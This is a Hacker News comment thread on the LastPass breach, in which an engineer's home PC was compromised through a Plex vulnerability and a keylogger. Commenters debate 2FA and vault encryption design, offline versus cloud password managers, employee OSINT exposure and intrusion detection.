Indeed. That's a neat plugin, each time you lock the database, it rolls forward your HOTP key some number of rounds, then uses the results of those rounds to encrypt a piece of key material for the vault. Then, when you go to decrypt, as long as your HOTP app hasn't generated more than the number of rounds it rolled forward, it can generate the decryption key from the HOTP stream and decrypt the vault. A little fragile, but a neat implementation.

> right after you enter your 2FA malware can steal the decrypted database out of memory.

There's probably a creative protection here where each key is encrypted individually, but you'd still need some solution like the above HOTP trick or the attacker could scrape the key information out of memory, then decrypt each entry individually.


>There's probably a creative protection here where each key is encrypted individually, but you'd still need some solution like the above HOTP trick or the attacker could scrape the key information out of memory, then decrypt each entry individually.

It seems to me like that would require a separate HOTP device for each password database entry, otherwise the malware can steal one HOTP token and use it against a different entry.


> It seems to me like that would require a separate HOTP device for each password database entry

That would be a paranoid level of implementation. As it sits, the HOTP device is only _sometimes_ needed depending on the caching policy. Fix that broken implementation first, then we can figure out how to update the threat model to account for an adversary that has already infected your computer.


>As it sits, the HOTP device is only _sometimes_ needed depending on the caching policy.

I don't understand what you mean. Are you talking about https://keepass.info/plugins.html#otpkeyprov or are you talking about LastPass? LastPass doesn't support HOTP AFAIK. HOTP isn't a very good form of 2FA (it's phishable, sometimes inconvenient, and it can become desynced), U2F is much better, but you can't encrypt a database with U2F.

KeepPass has a very customizable policy of when to lock the database. I have KeePass on my desktop set to lock if KeePass is inactive for 1 hour, or if my computer is inactive for 10 minutes, or if I lock my screen. Are you saying there should be a semi-locked state that requires a password but not a 2FA? Sure that's possible.

None of this protects you from malware on your computer though, so I don't know why we're talking about it.


ah i get it!

I was trying imply that you need 2fa for the services itself so the passwort alone is useless.

Ironically office 365 has a nice implementation, where it for instance requires all admins to use MFA


Malware can steal everything that's accessible right after you type in the 2FA.


How would you fix this problem with 2fa? I can't imagine how this would work technically. Maybe I am missing something.


You could ask user to present second factor (secure one, Webauthn) for every password they access. That would be a notable obstacle for me as an attacker, but I can't imagine any organization implementing this for real (maybe apart from military/spooks and their contractors). All of the IAM solutions I know of cache their creds and password manager usually is expected to work offline as well, so I don't think you can avoid having recoverable (in the CS meaning of the word) database locally.


It doesn't need to be every password, just require 2FA to unlock the vault in the first place. Downloading the vault shouldn't strip one factor, but it seems like that is the implementation.


I'm not aware of any encryption algos that can encrypt data using a rotating key such as a TOTP code. The vault file is encrypted using the master password, if you encrypted it with the TOTP code you wouldn't be able to decrypt it 30s later, and if you have logic to parse the 2FA I can just replace your logic with return true;


Wouldn't this be an implementation detail of the password manager? Either way, I hear you that this is asking for new functionality. Still, I don't think most people think that a factor disappears depending on the caching policy of the vault on your machine. It's quite a footgun.


No, since the cached data has nothing todo with the password manager. The cached data is just an encrypted file. Sure the password manager could ask for the otp but the cache file was attacked directly. That is why I was wondering if I was missing something. To my knowledge it isn't possible to protect a file with a rotating key.


> To my knowledge it isn't possible to protect a file with a rotating key.

This is my point, it is an implementation detail of the password manager to integrate OTP or another second with decryption of the vault. Any password manager can implement this.

From the perspective of the user, you are stripping a factor for some arbitrary period of time. It's a broken implementation.


That is not correct. You can not have offline caching and otp enabled at the same time. That is why things like yubikey exist. If your are not using another 2fa method besides otp it's either the security risk or entering otp each time you access the vault. Obviously the later is not feasible.


> You can not have offline caching and otp enabled at the same time.

I'm not sure why you are having such a hard time understanding this is an implementation detail of the password manager that can change at any time. You are treating this like it cannot be implemented differently. It absolutely can.


If you have the master password and the encrypted vault then you are in. The 2FA portion is for access to the encrypted vault.


Require the second factor for decrypting the vault. It seems the second factor is "removed" as soon as you cache the vault on your machine.


Okay, but the attacker has RCE on the system doing the decryption, so they can scrape the encryption keys or the vault data out of memory. This appears to be a APT, probably a State-level actor. Once the production work machine was compromised, it's all over.


I get what you're saying, but the implementation of 2FA is still broken. If we don't fix that, we can't fix what comes next either.


I'm not aware of any 2FA that could be successfully integrated into a symmetric-key encryption algorithm. How do we fix 2FA without making the entire password vault system dependent on network access to a central LP server that is not compromised?


Good job moving the goal post.


I work for a LastPass competitor.

As far as I know, no popular password manager seriously includes "fully compromised local device" in their threat model. I don't think it can be done without hurting seriously usability (like having one 2fa verification each time you use a credential would work) and the predictable outcome of hurting usability too much is that people will find more handy insecure ways to store their passwords.


> I don't think it can be done without hurting seriously usability (like having one 2fa verification each time you use a credential would work)

I wouldn’t mind tapping a YubiKey or my MacBook‘s Touch ID every time a password is accessed from the vault. That’s essentially how ssh keys work with smartcards or security keys as a second factor.


Usually non-technical management are the ones that are against this kind of measures. This recent Passkeys initiative (that's what allows using secure enclave as a Webauthn key) is amazing though, I really hope it changes the game and maybe finally obsoletes passwords as a whole.

Also, as an aside. While correctly implemented Passkeys (without fallback auth methods) would make my life as a red teamer much harder, that would have only prevented this attack if the infected machine was engineer's private PC where they used corporate LastPass account and nothing else from their work. If the machine that's used for DevOps work gets infected, that's still and endgame because you're generating all sessions I need during your regular workday, so I don't really need the passwords / decrypted vault.


> like having one 2fa verification each time you use a credential would work

I'm interested in the technical idea here. You have a set of credentials encrypted with AES. So each vault item is encrypted with a symmetric key. How would you build a system to generate those keys using a rotating 2FA that isn't reversible by an attacker that can watch the entire process and can fake the timestamp or other elements on the computing device as needed?

I can see that you have code that enforces 2FA on each vault access, but that code is run on the local system, so it can be trivially bypassed by an attacker with root.


Don't store the encrypted passwords locally. Have them on a server that deliver them only against a valid otp/push notification confirmation on your phone/yubikey tap etc.


That's a valid solution, but I would not select a password vault that was dependent on network access. Offline access to secrets is important to me. Other people might feel differently, of course.


Absolutely agree with you. No offline access was one of the usability trade off I was referring to, that no one seems ready to make in practice.

The product I'm working on have had for a long time an option to require a second factor for each login which works a bit as at described (encrypted data are stored locally but also encrypted with a key that's stored on our servers and protected by 2fa), but at the vault level, rather than at the credential level (it doesn't protect against device compromise, but prevents brute forcing of local data for exemple. You do lose offline access) and the UX is already annoying enough that in practice this feature is very rarely used and we are regularly considering dropping it.


1Password has become really onerous to use in these days of Javascript front ends and PWA's that do norm-breaking things to the UI in a browser. I often get stuck in some sort of crazy loop trying to authenticate the browser plugin versus the app, and then have more frustrations with taps in the apps being re-captured back from the plugin. If any more frustration gets added to the workflow than I'm already experiencing, I'm going to abandon it for Apple's keychain, though I loathe the idea of letting Apple have this last piece of my personal data footprint.


Unfortunately I'm not sure I'm going to manage to sell you our product (and won't even make you the offense to try): we decided to drop our desktop apps alltogether a few years ago and we only have a browser plugin now. Also I don't think we support yubikey login anymore as a result :/ (which I think is what you are referring to by "tap").

I hope you find a product that works for you!


Better trust nobody when it comes to security.

I'm using offline keypass. It's great.


That wouldn´t help with a malware scenario.

A Hardware Security Module would avoid exfiltration of secrets.

(Off-line AND off-device)


Wouldn’t that be susceptible to the same attack?


Basically yes, but the difference in threat potential between “random person” and “person who controls access to the secure passwords of many thousands of people, most of them more tech savvy than the average user” is exponential.


No? You'd have to carry out the third-party software RCE on each individual user to install a keylogger. This attack installed a keylogger on a single computer, then exfiltrated millions of passwords. Centralization is a bad thing. Same modus operandi maybe, but nowhere near the same impact.


Yes, but the article made it seem like they had RCE to his home PC. With that they installed the keylogger to retrieve the master key which they then used to decrypt the offline vault.


I think the point is that all of the users of Lastpass whose passwords were put at risk through this one breach. Using Lastpass means that a single, high-value target is now an attack vector that can affect you. If you keep it offline yourself, you're not likely to be a high value target, and you won't have to worry about the 3rd party with your passwords being compromised.



This cannot be overstated. The online managers have an absurd amount of complexity. Just think of all the millions already spent tracing back the attack, writing these statements, all the turmoil inside the company... just for the convenience of synchronizing passwords seamlessly.


https://pberba.github.io/security/2020/05/28/lastpass-phishi...

From what I can tell, all of lastpass mfa options are based around some form of otp not webauthn.

We tested the above in our own environment, since we had control of the devices we did not need urls to do it. We just grabbed the data locally to confirm if it was true. At the time lastpass told us webauthn was in the pipeline so we stayed.


In my experience the majority of hacks are from a compromised laptop of a production engineer. Everyone blindly NPM installs away all their problems and no one checks signatures anymore. Most are using package managers like Brew that don't sign anything to begin with.

At Distrust, my security consulting firm, we train all our clients to build production systems that require a minimum of two engineers to mutate and that only pristine operating systems access production that have only signed reproducible used packages that have never been used for anything else.

Production environments need to be managed like careful methodical clean-room labs with strict accountability. Instead they are managed like collaborative art projects where everyone is trusted and nothing bad can happen.


In this case, the anonymous source says that Plex server was compromised, so I assume it was a developer's home PC, not a work laptop.

The breach was preceded a couple of days by Plex corporate breach which devulged the engineer's credentials and home IP address.

This would have allowed the attackers to access Plex sever remotely, after which the source claims they used an RCE to install a keylogger (and probably a back door) on the engineer's PC.

The concerning part is that according to Plex devs (in their reddit sub), they have NO KNOWLEDGE of any RCE. They also haven't communicated with Lastpass, and no one reached out to them.

So if there's a Plex remote code exploit - it is still unpatched and actively being exploited - 8 months later!

Given that there is still no information on this Plex RCE, we should not assume that it requires authentication to function. So if you're using Plex, make sure to turn off public accessibility asap!


If you don't need remote access to your plex, you should disable it. The cache features are pretty good, so you could download media while at home and have it on a device in the car or at work pretty easily.

I think it's pretty dubious that they could pin it on a plex media server breach though. This is from the same company that sells logmein and goto; I haven't heard definitively that those pieces of software weren't installed on there.. Unless this machine was used for Plex and the occasional log in to work from home type thing, I doubt you could do the forensics on it with much reliability unless you got to it within days of the attack. If this is a normal devops guy? He's got 3 different chat apps, probably Steam, who knows what pirated crap is on there... Plex seems like a very convenient target; the plex corporate attack seems very very plausible as giving the attacker information though.


This article is painfully light on the details. The blog post they linked is much more informative: https://support.lastpass.com/help/incident-2-additional-deta...

DevOps itself is a huge (and thin) attack surface. This is a feature of software as a centralized business venture.

If your company is storing user data, then it must be someone's job to do that. They need administrative server access to do that job.

The important takeaway is that the data itself can still be safe. So long as the company did not have a way to decrypt it, that data can rest anywhere. Guaranteeing that reality, however, is very difficult for a business - that is expected to be private about their implementations - to prove to its customers.

When this beach happened, LastPass should have focused on telling their users to never reuse the master password that they had set at that time. That's the biggest vulnerability: the content of their vaults (as copied by the attacker) was, and is, still kept behind that password. The need for each user to keep that specific password secret is the main effect of this situation.

This is a great reminder that you can't trust anyone to keep your data private. You can only trust math.


Only 4 engineers had this level of privilege at lastpass, how did the attacker identify the target? Linkedin... that's why you should not list where you work until you're no longer working there or list a completely different role than what you're currently in.

I'm listed as a janitor of where I work. Only those that know me, know what I really do.

I've tried to sell the policy forbidding employees from listing their positions or where they work on linkedin, each time management frowns and says no. One day they'll come around...


> I've tried to sell the policy forbidding employees from listing their positions or where they work on linkedin, each time management frowns and says no. One day they'll come around...

Forbidding employees from listing their role on LinkedIn would put them at a major disadvantage in job searching and recruiting.

Forcing employees to hide their role is unreasonable. The company doesn’t own the employee.


I disagree, but disclaimer I work at a company that allows you to.

If you work at an organisation like LastPass in a privileged position, then you need to be aware that you are an enormous target. And it's not just your own or the companies security you potentially compromise, but millions of others arguably most sensitive information.

In Australia, if you have a security defence clearance, you are not allowed to display that in your social media networks (e.g. Linkedin), despite that potentially being important to your other job prospects in such industry. For those exact reasons.

If your LinkedIn said you were a DevOps engineer at LastPass, you know for sure that they're a prime target.

I'm not arguing the legality of it, just the problem it poses if you don't. Perhaps the solution is to tighten who can see your position and you diligently only connect with people you absolutely know and not have connections of connections on.


I would assume you're still allowed to post your to social media in Australia. Security clearance is not a role. I doubt people post they have access to all the infrastructure on their linkedin but you can infer it by the role.

Linkedin doesn't even matter since you can buy the data any way. Email Signatures are mined to get role and contact info for databrokers. Anytime you email outside of the org, the CRM software could be grabbing that info and feeding back to a databroker. Not to mention people using addons to their mail clients. Why I don't use one at my current company even though it is company policy to have one from our HR department. Thats just email. There's also the credit report data that has your role on credit applications and also when you donate money to politicians/PACs that makes you list your role for compliance reasons.


Yes, I don't know any company in Australia that doesn't allow you to post to social media. In fact in the company I work for it is actively encouraged.

My point being is that there are details you aren't allowed to put on your social media accounts, for the reasons we're debating.


Have you consulted a lawyer to check if you can even forbid employees doing this? It sounds unenforceable to me (depending on your country, YMMV of course).


In the US, it's legal under threat of being fired, since companies can fire you for any reason as long as it's not discrimination of a protected class.


California also has this law:

>Labor Code section 232.5 prohibits an employer from discharging or retaliating against an employee who discusses or discloses information about the employer’s working conditions.

https://www.dir.ca.gov/dlse/howtofilelinkcodesections.htm

I'm not sure if it applies, but I could see why lawyers might be nervous about forbidding employees from saying their role.


The actual law states:

  No employer may do any of the following:

  (a) Require, as a condition of employment, that an employee refrain from disclosing information about the employer's working conditions.

  (b) Require an employee to sign a waiver or other document that purports to deny the employee the right to disclose information about the employer's working conditions.

  (c) Discharge, formally discipline, or otherwise discriminate against an employee who discloses information about the employer's working conditions.

  (d) This section is not intended to permit an employee to disclose proprietary information, trade secret information, or information that is otherwise subject to a legal privilege without the consent of his or her employer.
I'm not sure if it's counted as trade secret or otherwise privileged information though.


I'm with management on that one. Big inconvenience to employees and no chance it would have prevented this attacker.


I’m not saying security through obscurity is an entirely false practice, but attempting to hide where you work is only going to obfuscate the truth. I’m sure sites like rocketreach* scrape from more than just LI.

*Please don’t pay this mob money, they are rent seeking, bottom feeding scum.


I have an extra colleague that works for a company called [redacted] which looks strange on his linkedin updates.

https://www.linkedin.com/company/redacted/


Thank you for proposing to cure the lack of competence with the lack of freedom, but the easier source of target identity is the August 2022 breach of LastPass


Insider Threat is real, can't discount that at all. What I can tell you as someone who participates in OSINT competitions and has engaged in red team activities, Linkedin is always the first stop when shopping for info.

Edit: Also wanted to mention 3 out of 4 incidents I am involved in is related to insider threat.


We can't discount the insider threat at all, but it's very easy to discount such shallow measures. Also, this wasn't a competition, and even there "the first stop" tells us nothing about its effectiveness (maybe the next 5 steps take 5 mins longer, but are even more accurate, so the benefit of the ban would still not exist)


Doesn't sound good for the employee.

Why would people wanna work somewhere you can't speak about their job role? I think that'd filter out tons of applicants.


Plenty of people work in roles they can't speak about when engaging with the government. All I'm advocating is not to broadcast it to the world, as it puts the person and their employer in danger.


> I'm listed as a janitor of where I work

Do you get a lot of janitorial service headhunting spam?


I get a few every month, all contract gigs working mostly at schools / government places.


Seems like a lot of their talk of zero knowledge was bs.

>In December, we notified a subset of customers whose SCIM, Enterprise API, and SAML keys were stored in unencrypted form. This only affected customers who joined LastPass and used these services in 2019 or before.

This part just blew my mind.

>Important: Since resetting MFA shared secrets destroys all LastPass sessions and trusted devices for these users, these users will need to log back in, go through location verification, and re-enable their respective MFA apps to continue using the service.

I feel sorry for everyones internal helpdesk. This is going to be brutal.


> “More specifically, the credentials for the servers were stolen from a DevOps engineer who had access to cloud storage at the company. This made it more difficult for LastPass to detect the suspicious activity.”

This comes off as spin to me by LastPass or LogMeIn’s PR department. Even if this was the case, how is it possible for intrusion detection systems to not observe and report abnormally high egress traffic? Downloading every vault should be a rather noticeable event.


I would expect that they'd setup something to notify them of - "abnormally high egress traffic downloading every vault", and yet due to alert fatigue, they never noticed. The specific thing with getting too many alerts is that you see them, but they aren't anyone's responsibility in general. The entire team gets them through email or sms or slack, and the new guys looks at them and wonders if we should do something about it like tweaking the criteria, and then gets other stuff to work on and learns to mostly ignore the alerts.


That's really just a variation on the same problem though.

We installed security product X, job done, walk away happy![0]

[0]: https://yewtu.be/watch?v=62NyFTAKgOI


Maybe it was one of those odd and security-violating cases that give CISOs nightmares where they test by copying PROD to the SANDBOX.


Intrusion detection systems are utter shit and usually undergo even less real-world testing than recovery from a cold backup. Although we don't know LastPass'es architecture, it's also highly likely that with engineer's creds it was possible to exfiltrate database without any registered egress traffic at all.


It did, AWS alerted them on the traffic. It reads like they ignored it and when investigators later started going over that data it jumped up and slapped them.


If they only took the vaults after a user accessed them, that would be less than double the traffic in the system. It depends how patient they were, or how broken the system was.


First of all: If you have the title of "DevOps" what you're doing is "Operations", you aren't practicing DevOps.

Anyway, this company has had incident after incident. This will keep happening every few years for them like it has for the past 10. As will lack of transparency/ outright lying.

Some commenters are saying they wish the company the best. I don't. Use something else. LastPass needs to die.


> First of all: If you have the title of "DevOps" what you're doing is "Operations", you aren't practicing DevOps.

So what title do you need to have to practice DevOps?


"DevOps enables coordination and collaboration between formerly siloed roles like development, IT operations, quality engineering, and security." - https://learn.microsoft.com/en-us/devops/what-is-devops

It's not a job title, it's an engineering practice. People who participate in DevOps include "software engineer", "network engineer", "IT operations engineer", "platform engineer", "cloud engineer", "quality engineer", "security engineer", "manager", etc.

I'm also one of the people who does "operations" but has a DevOps job title. I've grown to accept this as a second definition, it's quite common now.


I do not like the title either, but I do understand the motivation of taking all those "non-software engineering", technical roles and putting them under the same umbrella, due to a lack for a better title, because a company might not afford to have separate roles for each of those areas you have listed above.

"OPERATIONS ENGINEER" might work, but it raises another set of problems, e.g. does it imply operational responsibility (on-duty) work, which I don't think is a given in DevOps jobs nowadays.


What's wrong with system administrator? IT specialist? Cloud engineer? Reliability expert?

There are many options that don't tack "dev" into your non-dev job titles.


Did you even read my comment? None of your provided alternatives solve the issue of the current market being in demand of such a wide set of skills outside of the "normal software development" practice (whatever that even is), that labeling all of those under whatever title will get some people butthurt.

If its a matter of gatekeeping the "developer" status, go read some actual job posts with the title DevOps in them. Its not uncommon to come across proficiency requirements in at least one programming language (e.g. Go/Python/Rust), used in automation libraries, cli tools or whatever, which the applicants are expected to "develop". Or is it just constructions that can be developed?


If you start on that tone, you get what you ask for. I will obviously not read this comment.


Something according to "You build it, you run it".


We're reminded that cloud services are ultimately someone else's computer. Putting one's secrets someone else's computer under the marketing of convenience is just that.

This is not just to do with LastPass. It doesn't make sense why one would put their personal, most valuable passwords in the hand of another party. Of course, it's handy on a team between people.

When it comes to our bank accounts, do we trust someone like that with the pin numbers to our credit and bank cards?

One positive that comes out of this is that it raises awareness of thinking about the difference between security and convenience to manage one's own passwords.

One solution? Locating a zero, or no knowledge file storage system which is encrypted at rest and transit and placing your own files on it is the first start.

Spideroak used to fill that slot nicely (not sure if it's available anymore), and others I have heard about are sync.com and syncthing which do this just fine. Are there any other solutions that would be reasonably teachable to the average user?


I really don't understand the point of these cloud password managers. Use something like KeepassX. Encrypt it with AES256, upload it to Dropbox, Google Drive, whatever. I personally throw the encrypted p/w file in an encrypted MacOS disk image with a secondary, separate memorized passphrase as well. Literally solves the problem without having to trust or pay some random sketchy service.


Sharing with family sucks with these. No permission control and no simultaneous write from multiple devices make those unusable


Wouldn't most of the use cases be reading, instead of writing?

I have seen people create multiple files on a share that works fine. I wasn't too keen on it at first but it did seem to work OK.


I create accounts quite often, so I would expect collisions to happen, the cost of mistake is high.

The other problem is that there is stuff you want for yourself, stuff shared with your partner, stuff shared with all the family (children included) and stuff shared 1-on-1 with each child.

That gets messy quickly.


Hopefully an upsurge project will eat this problem soon.


Because that's unbelievably less convenient.


> This was accomplished by targeting the DevOps engineer’s home computer and exploiting a vulnerable third-party media software package, which enabled remote code execution capability and allowed the threat actor to implant keylogger malware. The threat actor was able to capture the employee’s master password as it was entered, after the employee authenticated with MFA, and gain access to the DevOps engineer’s LastPass corporate vault.


Bring your own computer for DevOps ?


I went through the pain of resetting hundreds of my passwords since the last breach during which they lost encrypted data. It was brutal, took several weeks and I had to spend late nights and weekends resetting passwords as a hobby project.

I am glad I went through all the pain.


For anyone who still needs to do this, consider deleting accounts you no longer need. For some sites it's about the same effort to change a password as it is to delete an account (others... a lot more). The next time you need to bulk change passwords, you'll have fewer to change.


I think something that should have been in the title is that the breach was facilitated by a vulnerability in an application that many users here might have, Plex. They don’t speak on the nature of the vulnerability in that application. Has it been addressed and fixed through security patches already, or is Plex still potentially dangerous right now?


Plex devs commented in Reddit that this is the first they've heard of it and haven't identified any RCE, let alone patched anything.

So if you're running a Plex server, you should disable public access immediately.


> Following the incident, LastPass has taken a number of steps to prevent future attacks and investigate what happened. The engineer was assisted in strengthening the security of their personal network [...]

I hope this involved something along the lines of: "This zoom meeting won't end until you update your router firmware".


I'm fascinated that this was part of their remediation. I'd consider "don't trust the employee's local network" to be a pretty basic principle of modern corporate information security. What happens when an employee logs in from hotel wifi? You basically have to treat the network between the user and your environment as hostile, and design for that problem.


And as an employee, "don't trust the company's local network" with your own devices either.


For my personal devices, I trust my company's local network essentially the same as any other network my mobile devices connect to.


Nevermind the Plex vulnerability. Nevermind that the thieves are called here "hackers" and the theft, an "attack". It all makes it sound like more of a feat than it actually was. The bottom line for me is this: you outsource your security to a company whose sole reason for existing is to be more paranoid about it than you, and they tell you that what should be among their most treasured and garded secrets can casually be found in a coffee shop nearby.


There's a weird combination of "what happened" and causation in here:

>> the credentials for the servers were stolen from a DevOps engineer who had access to cloud storage at the company. This made it more difficult for LastPass to detect the suspicious activity.

How does A => B?

>> The threat actor was able to capture the employee’s master password as it was entered, after the employee authenticated with MFA, and gain access to the DevOps engineer’s LastPass corporate vault.

The part about authentication and MFA doesn't track with the rest of the sentence. How does a password without also having the MFA channel work? How would this give me access to a LP vault? Why were they on their home machine?

I understand it must be hard to try and come clean in a RCA without injecting some excuses and mitigating factors but you can't attempt soften the blow or the entire thing is a big, smelly mess. It should be a bunch of facts with no emotion, THEN the mitigation and lessons learned. LP just issued a bunch of press releases.


> The part about authentication and MFA doesn't track with the rest of the sentence. How does a password without also having the MFA channel work? How would this give me access to a LP vault? Why were they on their home machine?

I think the idea here is that we want the cryptography operations to happen entirely locally, so that LastPass doesn't have any access to them. However, if you do that, someone with root on that system and the Master Password can replicate the operations the local system does on the vault. I'm not aware of any symmetric-encryption algorithm that includes a time-based un-replayable TOTP or HOTP in the key-generation process.


Ironically, if they’d used a LastPass generated pass on plex, it would have been infeasible to crack the breached plex password. Using LastPass would literally have prevented a breach of LastPass.


No, they breached Plex with a vulnerability. Then they installed a keylogger. Edit: Is there a source about how exactly they got into Plex? I assumed it was via port scanning plus some Plex vulnerability, not that they guess the Plex password.


Welp, I guess it is totally not LastPass's fault then. Darn DevOps engineer should have known better.


Sometimes I wonder if I shouldn’t google the weather on my work computer because it might have some crazy exploit or cause an alert.

DevOps guy here is just running a Plex server and probably pirating porn on his work laptop because why not at that point. Can’t even bother updating this which Plex makes literally about as easy as they possibly could. It’s a one click fully automated process with zero interruption. Was he using internet explorer too?

Or was it his work laptop or did they just let him log in to work on any random computer?

Did he actually get any work done? I want to hear an interview from this guy. How did he get hired as DevOps while avoiding all the basics of fundamental basic work practices?


Im not sure that they are just using this as a scapegoat but if your working from home, as a DevOps/Platform engineer, your very first ticket should be to activate MFA.

Kubernetes does MFA, all the Clouds do MFA and the company you work for can afford a "cheap android phone as key".

No matter if bare-metal, cloud or managed. If you habe ANY edit rights you need MFA.


MFA wouldnt have helped here. The hacker had the encrypted vault all they needed was the password.


which in turn should not be the end of the world, because its MFA all the way down right?


If you have an encrypted vault file and the master password (or decryption key) you don't need 2FA, there is no known encryption algo that uses a rotating key like TOTP, the implementation of 2FA is always software-sided, and in the case of a vault file (like here), you don't need the software.


MFA is not used when you decrypt your vault on any password platform. It's just to receive the encrypted vault


well i was more thinking along the lines of every service in your vault implementing additional 2fa.

In the kubernetes world it really is not so difficult


The Plex angle & note about securing their personal network had me curious about whether this person had a server exposed to the internet or if the attacker was only able to access it because they’d already compromised LastPass’s VPN. Nobody is looking good here but the former case would be especially regrettable.


You probably at least need remote access within Plex in order to install new plugins, meaning you could probably run the exploit by just having his username and password.


Plex itself was hacked around the same time...


What could possibly go wrong with a centralized password database


Low value comment.



Interesting that the article you link is from a website that recommends password managers?

One key thing however is I'm not seeing Bitwarden in this list, big ups to them.


Well, that's probably because they're making money off adverts for password managers. Just because a service hasn't been hacked yet doesn't mean it is secure.

For myself, I just use google's password manager for non-critical passwords, and I use a single password for all my banking. I feel that is safer than using a password manager.


I'am honest, similar things could happen on my laptop for my personal stuff.

I have some AWS keys in some files that are used by terraform/packer. A hacker could easily get them.

Some other AWS keys are stored in the CI system and provided as env variables. Someone that can merge/push to the specified branches can just change the CI script an exfiltrate them.

How can I fix that?

I would need some MFA for both cases. I would imagine it would be a good idea that I have to confirm each action on MFA device, which will then generate temporary tokens that are invalid after a few minutes. I locked into some solutions like Hashicorp Vault but I was not able to build something in a short time. New features were always more important.

How do you do it?


YubiKeys and aws-vault for managing my credentials. Hashicorp Vault and SSM for services.


Nice! Do I understand this correctly?

You use aws-vault(https://github.com/99designs/aws-vault) and configure it with IAM and MFA with YubiKeys. You configure e.g. the profile jonsmith.

When you run

aws-vault exec jonsmith -- aws s3 ls

it will ask you, e.g. every hour to confirm with YubiKeys and cache the key for one hour. After that the temporary keys expire. Can you also store keys different from AWS?


For anyone that had been deep in LastPass with passwords, I recently switched myself and convinced my family also. We switched to another [read recommendations] online centralized password manager. It takes a couple hours of your time-off; totally can stream some whatever show in the meantime to pass the time.

One benefit is that it made me audit my online accounts -- I removed many.

So: Be prepared to switch if you want this type of service. New normal.


> DevOps engineer

So LastPass, a security company, has people who are tasked with both delivering features as fast as possible using a variety of development tools (dev) and administer their production systems where critical data lies (ops). On the same machine, from home.

It seems that this breach is not really an accident and more a logical conclusion.


If lastpass was well designed, the company would store no private user data.

Ie. they would be a 'dumb' storage system for the customers encrypted data. The data would be encrypted by the customer before upload. And then decrypted again by the customer after download.

Users would be identified by a unique random ID, and users would auth by signing a challenge with a secret key known only to the customer.

That way, even if a bad guy worked for lastpass and had full admin access to all servers, they couldn't steal anything.

And, in fact, if this system was properly designed, it could all run with opensource server code, and the datastore fully open for anyone to inspect, to prove that the security is down to cryptography rather than trusted yet fallible humans.


What part of this is not happening right now with lastpass?


Does this breach mean that LastPass effectively "transforms" 2FA into 1FA?

Because the attacker did not need a separate __physical__ MFA (2nd F) after collecting the master password (1st F).


Pretty much, limiting mfa options to otp only. Then the attacker getting access to customer shared secrets means they basically just have to guess the master password.

>Backup of LastPass MFA/Federation Database – contained copies of LastPass Authenticator seeds, telephone numbers used for the MFA backup option (if enabled), as well as a split knowledge component (the K2 “key”) used for LastPass federation (if enabled). This database was encrypted, but the separately-stored decryption key was included in the secrets stolen by the threat actor during the second incident.

Unless I am misunderstanding this, they mention to business users the need to reset shared secrets from OTP providers.

>For users of Duo Security, Symantec VIP, RSA SecurID, or SecureAuth, regenerate the shared secret for each respective MFA solution and paste the new shared secret into the respective MFA app configuration in the Admin Console.


Why anyone ever trusted any of these products is beside me - it's a huge SPOF and you're literally betting your business they don't get compromised...


How many major incidents is this for LastPass already?


I really wonder how many companies have figured out how to properly secure equipment and access used by a distributed work force.


Am I understanding correctly:

A single engineer had both access to the prod database AND the data decryption values?


Depends on what you mean by "the data decryption values". If you mean the encryption keys for the vaults themselves, no. Those are derived from the individual master passwords (in non-SSO setups, with SSO it's more complicated, and I don't fully understand the impact). So the attackers have a bunch of encrypted vaults from a backup. They can now brute-force the vaults, but if the original Master Passwords were secure (16+ characters, all 4 classes), those vaults should remain secure. Of course, many people use bad passwords, and those people are at risk.


the exposed passwords isn't even the worst part. it's the fact that user vaults sites are unencrypted so now attackers know every website that you thought was important enough to save.

they know what bank you use, which adult sites you visit, what medical conditions you might have


I understand that some people feel that that is sensitive data. It's not a big threat for me. My ISP and Google already has that data in many cases (IP destination data, DNS lookups, etc.) YMMV.


ah, thanks for the clarification.


Wait, was he not using a password manager or something?

I hear lastpass is pretty good, if he needs recommendations.


People are likely to use weak passwords with Plex, just like they do with Netflix, so that they can easily share the details with other users and input it easily from memory on things like TVs and tablets.

I think generally people consider it low risk, because "who cares if someone can see what I was watching", but if you can get RCE on a computer running Plex Media Server just by logging in to the Plex account, then of course that's a huge security surface and your Plex login should be a secure randomly generated password and have 2FA enabled.

Of course, this can be avoided by paying for the premium Plex subscription which allows you to create accounts for other 'non-admin' users, but for people trying to avoid spending money (a large number of the Plex user base probably), then anyone with the login can change settings/administer the server.


imagine trusting a company with multiple incidents with all your passwords


I can't believe it's taken 6 months for them to divulge this.


Definitely way past time to switch from passwords to mTLS or WebAuthn


It's secure because the Engineering Manager said so.


LastPass - The gift that keeps on giving




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: